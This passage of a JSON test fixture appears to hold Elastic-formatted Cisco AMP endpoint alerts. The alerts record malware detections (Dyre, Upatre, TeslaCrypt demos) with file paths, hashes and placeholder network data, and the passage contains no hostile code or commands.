"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469674438Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176259286289613000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176259286289612895", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:18:13.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469676331Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176259234750005000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176259234750005342", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:18:01.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469678203Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176259183210398000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176259183210397789", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "explorer.exe", + "pid": 3164, + "hash": { + "sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "md5": 
"8b88ebbb05a0e56b7dcc708498c02b3e" + } + }, + "@timestamp": "2021-01-15T10:17:58.000Z", + "file": { + "name": "Fax.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", + "hash": { + "sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "md5": "b2e15a06b0cca8a926c94f8a8eae3d88" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "hash": [ + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "hostname": "Demo_Upatre", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469680172Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6180335966167761000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], 
+ "detection_id": "6180335966167760897", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:57.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469682061Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533668885361590000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533668885361590309", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:57.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469683932Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533668885361590000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533668885361590308", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:57.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469685813Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533668885361590000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533668885361590307", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:50.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469687673Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176259135965757000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176259135965757532", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad" + } + }, + "@timestamp": "2021-01-15T10:17:41.000Z", + "file": { + "hash": { + "sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:04.469689561Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}